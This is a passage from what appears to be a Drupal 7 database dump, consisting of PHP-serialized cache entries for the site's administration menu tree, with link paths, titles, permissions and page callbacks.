content.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:401;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"401\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:23:\"admin/structure/contact\";s:11:\"router_path\";s:23:\"admin/structure/contact\";s:10:\"link_title\";s:12:\"Contact form\";s:7:\"options\";s:121:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:71:\"Create a system contact form and set up categories for the form to use.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:3:\"401\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer contact forms\";}\";s:13:\"page_callback\";s:21:\"contact_category_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/structure/contact\";s:5:\"title\";s:12:\"Contact form\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:71:\"Create a system contact form and set up categories for the form to use.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:346;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"346\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:26:\"http://www.ollital.de/blog\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:58:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:9:\"Mein Blog\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"346\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1447855413,1),('links:management:tree-data:en:1748fbf3089600807f4bc7ab9e40005e2ac8c10e1d4c16c14a254c1df02e73fe','a:2:{s:4:\"tree\";a:2:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:14:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected 